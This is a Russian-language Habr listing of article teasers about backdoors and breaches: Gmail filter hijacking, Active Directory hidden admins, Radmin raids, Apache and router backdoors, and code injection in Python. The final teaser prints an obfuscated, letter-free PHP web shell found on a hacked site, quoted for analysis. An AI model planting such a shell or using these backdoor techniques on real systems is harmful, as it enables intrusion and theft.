Pull to refresh

ubuntu-ru shut down

Reading time 1 min
Views 1.1K
Configuring Linux *
Неприятное известие:
Сайт Убунту-ру.орг был отключен, вследствии подозрительной активности. Произошедшее расследуется.

текст в комментарии:
В форуме не хватало последних патчей, и кто-то использовал дырки в безопасности, чтобы установить бэкдоры. Убунту-ру.орг придётся восстанавливать с нуля, посты форума и вики в сохранности, но предположительно будут удалены пароли, для того чтобы их поменять.
В любом случае всё это займёт какое-то время, извините.

источник
Total votes 17: ↑15 and ↓2 +13
Comments 22

Познавательная история об уязвимости Gmail от Дэвида Айри

Reading time 2 min
Views 867
IT-companies
Достаточно известный дизайнер месяц назад подвергся атаке [пока] неизвестных скрипт киддисов, которые использовали уязвимость в любимом многими (в том числе мной) Гмыле.
История уже успела хорошо побродить по Сети, но если кто не видел — будет полезна многим. Опущу ненужные подробности (их при желании можно прочесть в официальном обращении Дэвида), попробую передать суть.
Злоумышленники использовали обидно простую брешь в безопасности ГМыла. Скрипты на зараженных сайтах отправляли POST запрос на страницу управления фильтрами в гмыле, при этом, если у юзера была активна сессия в последнем (к примеру, открыт инбокс в соседней вкладке), то запрос успешно исполнялся. А состоял этот запрос в добавлении простенького фильтра Matches: transfer-approval.com Do this: Forward to ba_marame_pooli@yahoo.com, Skip Inbox, Delete it, т.е. в пересылке всех входящих сообщений, содержащих строку 'transfer-approval.com' на указанный адрес, не сохраняя само письмо и форварды в ящике.
Сей эксплойт стар как мир, но я привык, что с его помощью можно от силы переслать все личные сообщения с какого-нибудь форума, но уж никак не атаковать такие серьезные сервисы, как gmail.
Дэвид отделался достаточно легко — у него увели домен с 2к уников в день и требовали $500 за возврат (по прошествии недели, кстати, снизили цену до $250, но он отказался выкупать домен даже за $1 из принципа). Такой «несерьезный» урон обусловлен вполне объективными причинами. Узнав из его блога о том, что он собирается в отпуск, киддисы сделали предположение, что вряд-ли он будет часто проверять свои фильтры и заказали перенос домена черз хелпдеск хостера. Для успешного переноса необходимо подтверждение, приходящее на почту, для этого и был установлен фильтр. Но в теории, если пользователь не пользуется фильтрами вообще, то так можно было в течение длительного времени уводить любые письма, содержащие слово 'password', к примеру.
Сейчас брешь уже заделана.

Мораль — даже у всемогущего Гугла, которого уже многие боятся, могут оказаться совершенно детские уязвимости. А всем разработчикам — на заметку, не допускайте подобного у себя :)
Total votes 50: ↑48 and ↓2 +46
Comments 39

Бэкдор в active directory своими руками

Reading time 3 min
Views 17K
Information Security *
Итак, мы все знаем про подлых пользователей c UID=0 в unix, которых может быть больше одного.

Посмотрим, как такое же (а на самом деле, даже более страшное) организовывается в инфраструктуре Windows. Разумеется, мы говорить будем не про локальные виндовые учётные записи, а про Active Directory, т.е. говорить будем об администраторе домена. Или, даже, хуже, об enterprise administrator.

Итак, истина номер один: у объектов в active directory есть атрибуты и права доступа.
Истина номер два: эти атрибуты можно менять.

Как легко понять, мы МОЖЕМ сделать учётную запись с фантастическими правами, к которой не будет доступа НИ У КОГО. Однако, он сможет логиниться, блокировать, разблокировать, менять свои атрибуты и атрибуты чужих людей.

В самом страшном случае, это будет пользователь с волшебным SID-*500, которого не позволяет удалить уже сама винда. (Для этого нужно переименовать, а на его место положить другого пользователя с ником Administrator и с полными правами).
Читать дальше →
Total votes 118: ↑100 and ↓18 +82
Comments 69

Исходники Unreal IRC сервера на официальном зеркале содержали бэкдор

Reading time 1 min
Views 629
Lumber room
Translation
Некоторые версии Unreal3.2.8.1.tar.gz на официальных зеркалах содержали бэкдор, который позволяет выполнять любые команды с привилегиями пользователя, от имени которого загружен ircd.
Разработчики уверяют, что сделают все, что бы такого не повторилось, и рекомендуют пользователям не относиться легкомысленно к PGP/GPG подписям
я попал?
Total votes 28: ↑24 and ↓4 +20
Comments 2

Предупреждаю пользователей сборки Zver и ПО Radmin

Reading time 1 min
Views 79K
Information Security *

Суть проблемы


Wikipedia:
Radmin (Remote Administrator) — условно бесплатная программа удалённого администрирования ПК для платформы Microsoft Windows, которая позволяет полноценно работать на нескольких удалённых компьютерах с помощью графического интерфейса. Кроме этого, программа позволяет передавать файлы и использовать режим голосового или текстового общения с пользователем удаленного компьютера.

Radmin состоит из 2х частей: клиентской (Radmin Viewer) и серверной (Radmin Server)....


Кто-то ставит себе эту программу сам, а кто-то даже не знает, что она у него есть... А есть она во многих самодельных сборках Windows XP, например в ZverCD.. Причем процесс (файл) Radmin Server может быть переименован под что-то вполне безобидное.

Прямо сейчас орда анонимусов с несколькольких имиджборд проводит рейд незащищенным тылам компьютеров рунета. Подбирают простые и не очень пароли к интерфейсу Radmin Server на порту 4899, после чего компьютер оказывается в полной власти анархистов.

Далее следует:
*Воровство денег из ЭПС.
1) установка троянов;
2) воровство сохраненных паролей почты и соц сетей;
3) копирование личных фото и видео записей и последующее размещение их в Сети.

Под катом банер акции.
Total votes 238: ↑170 and ↓68 +102
Comments 149

TeamViewer, как компонент бэкдора Win32/Sheldor.NAD

Reading time 2 min
Views 25K
ESET NOD32 corporate blog
Недавно аналитики ESET обнаружили интересную вредоносную программу – Win32/Sheldor.NAD, которая является модификацией популярного ПО для удаленного администрирования компьютера – TeamViewer.

Данные сведения были получены при проведении экспертизы в рамках расследования инцидента, инициированного Group-IB и связанного с мошенничеством в системах ДБО. При этом злоумышленники умудрились провести несколько поддельных транзакций и похитить около 5 миллионов рублей.

Win32/Sheldor.NAD – устанавливается посредством троянской программы-инсталлятора, которая внедряет в систему модифицированную версию популярного пакета для удаленного администрирования — TeamViewer пятой версии. Причем многие компоненты содержат легальную цифровую подпись:

image
Читать дальше →
Total votes 77: ↑51 and ↓26 +25
Comments 36

Backdoor в Active Directory

Reading time 4 min
Views 9.4K
Information Security *
В свое время, менее года назад, на хабре мелькала публикация с аналогичным заголовком [1]. В ней автор предлагал способ по сокрытию привилегий администратора домена путем использования в качестве контейнера, для размещения «скрытой» учетной записи, служебное хранилище «Program data», в совокупностью с агрессивным разграничением прав с целью предотвращения доступа к «спрятанной» учетной записи. Однако, несмотря на заверения автора, обнаружение «скрытой» учетной записи и ее последующее удаление можно было выполнить всего в несколько кликов.
Читать дальше →
Total votes 82: ↑78 and ↓4 +74
Comments 15

Пользователь обнаружил еще один бэкдор под Mac: BackDoor.Coffee

Reading time 1 min
Views 622
Lumber room
image
Еще первого июня этого года на Хабре появилась статья "Эпоха антивирусов на Mac OS X пришла официально". И действительно, сейчас стали появляться вирусы и scareware под Mac OS X, не такие уж и опасные, но зато пугающие «маководов», привыкших к безопасности своей ОС, до дрожи в коленках. Паника заставила Apple выдать «на гора» Internet Security. Возможно, эта штука поможет пользователям Mac OS X защититься от очередного бэкдора, обнаруженного случайно одним пользоавателем. Насколько известно, это третий бэкдор для указанной операционной системы дальше будет больше.
Читать дальше →
Total votes 58: ↑26 and ↓32 -6
Comments 10

Анализ очередного варианта скрытого радмина

Reading time 4 min
Views 30K
Antivirus protection *
Сегодня на форуме в личку прошло сообщение с просьбой проверить файл. Я согласился, любопытно же. Немного опережу события и скажу, что это бэкдор созданный из радмина второй ветки и кое-что еще)
Полученный файл: kak_ponyat_muzhchin_bibl.ru.exe (md5:2138A224BDDD1A36329F398A37E10AB9)
Хэш суммы я буду указывать только для вредоносных файлов.
В общем по описанию — это какая-то книга, почему в exe — непонятно, глядим далее.
Воспользуемся PEiD:

UPX 0.89.6 — 1.02 / 1.05 — 2.90 (Delphi) stub -> Markus & Laszlo [RAR SFX]
Попробуем распаковать винраром, получим два файла:
Читать дальше →
Total votes 89: ↑78 and ↓11 +67
Comments 76

Извлечение AES ключа в мгновение ока

Reading time 1 min
Views 4.2K
Information Security *
Сергей Скоробогатов, который недавно обнаружил бэкдор в китайском чипе FPGA, произвел успешное извлечение ключа AES, который отмечен как «высокозащищенный» и «практически неломаемый», на FPGA военного уровня Actel/Microsemi ProASIC3 за 0.01 секунду.
Использовался способ анализа сторонних каналов, который назвается Pipeline Emission Analysis (PEA).
Это не новый способ сам по себе, а значительно улучшенный метод волнового анализа.
Данный способ, как подсказывает Ocelot, используется для атаки на реализацию AES на FPGA, используя наводки и помехи.
Подробнее (pdf)
Total votes 62: ↑49 and ↓13 +36
Comments 17

Backdoor в вашем приложении на Java

Reading time 2 min
Views 6.6K
Java *Groovy & Grails *
Я недавно наткнулся на статью, описывающую простейший грувлет, позволяющий исполнить любой код на Groovy у Вас на сервере. Мне это показалось очень удобным для организации отладочного бэкдора.

Проблема в то, что грувлеты — это всё таки сервер, а у нас есть еще толстый клиент на Swing. Для него мне хотелось бы сделать нечто похожее, но встраивание какого нибудь embedded Jetty или Tomcat только для этого в клиент выглядело как то слишком.

По счастью, мне попалась на глаза и другая статья — про наличие в стандартной библиотеке Java простейшего веб сервера. Вот им то я и решил воспользоваться.
Читать дальше →
Total votes 10: ↑6 and ↓4 +2
Comments 15

«Backdoor» для мозга уже создан!

Reading time 3 min
Views 7.4K
Information Security *
Sandbox

Специалистам по безопасности трёх стран впервые удалось выудить из человеческого мозга важную информацию. Причём данные о банковских счетах, дате рождения и месте нахождения участников исследования были получены относительно простым способом.
Читать дальше →
Total votes 108: ↑75 and ↓33 +42
Comments 88

Gray Hat Python — DLL и Code Injection

Reading time 19 min
Views 29K
Python *
Sandbox

Intro


Порой, когда вы реверсите или атакуете программу, полезно иметь возможность загрузить и выполнить свой код в контексте исследуемого процесса. Крадете ли вы хэши паролей или получаете доступ к удаленному рабочему столу целевой системы, методы внедрения кода и dll-библиотек предоставляют мощные возможности. Мы создадим несколько простых утилит на Питоне, которые позволят вам использовать оба метода. Эти методы должны входить в арсенал каждого разработчика программ, эксплойтов, шелл-кодов и пентестеров. Мы будем использовать внедрение DLL (DLL injection) для запуска всплывающего окна внутри другого процесса. Так же мы будем использовать внедрение кода (code injection), чтобы протестировать шелл-код, разработанный для уничтожения какого-либо процесса основываясь на его PID. Под конец главы мы создадим и скомпилируем Trojan’a (с функционалом backdoor’a) полностью написанного на Python. В большей степени он будет опираться на внедрении кода и использовании некоторых других скрытых тактик, которые должен использовать каждый хороший бэкдор. Давайте начнем с рассмотрения темы создания удаленных потоков, которые являются основой для обоих методов внедрения.
Читать дальше →
Total votes 28: ↑27 and ↓1 +26
Comments 13

Бэкдор в phpMyAdmin

Reading time 1 min
Views 13K
Information Security *
25 сентября стало известно о компрометации одного из корейских зеркал SourceForge (cdnetworks-kr-1).

В архив phpMyAdmin-3.5.2.2-all-languages.zip, находящийся на этом зеркале был внедрен бэкдор.
Читать дальше →
Total votes 39: ↑36 and ↓3 +33
Comments 17

Burn-in рутовый шелл в IP-камерах Vesta и не только

Reading time 5 min
Views 57K
Information Security *
Так получилось, что передо мной встала задача записывать и хранить видео с IP-камер. Были закуплены и смонтированы камеры Vesta VC-6206 IR без представления архитектуры информационной системы на их основе. Совсем короткий период эксплуатации показал, что камеры имеют свойство зависать и неплохо бы их перезагружать периодически. nmap показывал, что у камеры доступен только telnet, http и rtsp. Ребутать камеру телнетом по крону показалось мне неплохим решением, но рутовый пароль техподдержка дать отказалась.
Читать дальше →
Total votes 73: ↑64 and ↓9 +55
Comments 29

Linux/Cdorked.A: хроники нового Apache-бэкдора

Reading time 5 min
Views 16K
ESET NOD32 corporate blog
На прошлой неделе коллеги из Sucuri прислали нам модифицированную версию бинарного файла веб-сервера Apache, который перенаправлял некоторые, адресованные к нему запросы, на набор эксплойтов Blackhole Exploit Kit. Проведенный экспертами нашей антивирусной лаборатории анализ показал, что эта Linux-угроза, получившая название Linux/Cdorked.A, предназначена для перенаправления трафика на вредоносные сайты. Информация Sucuri об этом инциденте.

В процессе анализа мы пришли к выводу, что Linux/Cdorked.A представляет из себя наиболее сложный Linux-бэкдор из всех, что мы видели прежде. С помощью нашей облачной технологии ESET Live Grid мы получили статистику о сотнях скомпрометированных веб-серверов. В отличии от других подобных угроз, бэкдор не оставляет каких-либо следов своей деятельности на жестком диске скомпрометированного хоста, что заметно усложняет его обнаружение. Вместо этого, он хранит всю используемую им информацию в памяти, без привлечения жесткого диска. Кроме этого, злоумышленники используют обфусцированные HTTP-запросы для передачи служебной информации вредоносному коду, которые не фиксируются в лог-файле работы Apache. Таким образом следы взаимодействия вредоносного кода с C&C сервером также отсутствуют.

Читать дальше →
Total votes 42: ↑35 and ↓7 +28
Comments 32

Бэкдор Win32/Syndicasec.A используется в операции кибершпионажа

Reading time 7 min
Views 10K
ESET NOD32 corporate blog
Недавно мы столкнулись с интересным образцом вредоносного кода, который обнаруживается ESET как Win32/Syndicasec.A. Он обращал на себя внимание по ряду следующих причин:
  • Наша система телеметрии показывает весьма небольшой масштаб заражений данной угрозой, а география распространения ограничивается такими странами как Непал и Китай. Предыдущие версии этого вредоносного кода фиксировались нами начиная с 2010 года.
  • Полезная нагрузка представляет из себя небольшой фрагмент кода на Javascript, который регистрируется с использованием подсистемы Windows WMI.
  • Бэкдор использует веб-сайты поддельных блогов для получения информации о командных C&C серверах. Эти веб-сайты размещаются на доменах, зарегистрированных в Тибете.
  • По своим характеристикам эта операция очень похожа на предыдущие шпионские кампании, направленные против тибетских активистов, такие как OS X Lamadai и другие.

Мы провели детальное исследование этого бэкдора и выяснили детали его установки на скомпрометированный компьютер, используемые им механизмы по поддержанию своего присутствия, а также детали взаимодействия с C&C сервером.

Читать дальше →
Total votes 34: ↑31 and ↓3 +28
Comments 6

Backdoor в роутерах D-Link

Reading time 2 min
Views 112K
Information Security *
В роутерах D-Link (DIR-300revA, DIR-300revB, DIR-600revB) обнаружен backdoor.

Немецкий исследователь просканировал некоторые устройства D-Link nmap-ом и обнаружил открытым порт 23\tcp (telnet).
Читать дальше →
Total votes 79: ↑70 and ↓9 +61
Comments 99

PHP-шелл без единого буквенно-цифрового символа

Reading time 1 min
Views 89K
Information Security *PHP *
Вчера в блоге компании Sucuri появился любопытный вопрос: некий владелец сайта, обнаружив его взломанным, был немало удивлён, обнаружив следующий злонамеренный код; что именно он делает?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Как видно, в коде нет ни вызовов функций, ни вообще какого-либо буквенно-цифрового символа.
Узнать подробности
Total votes 119: ↑105 and ↓14 +91
Comments 33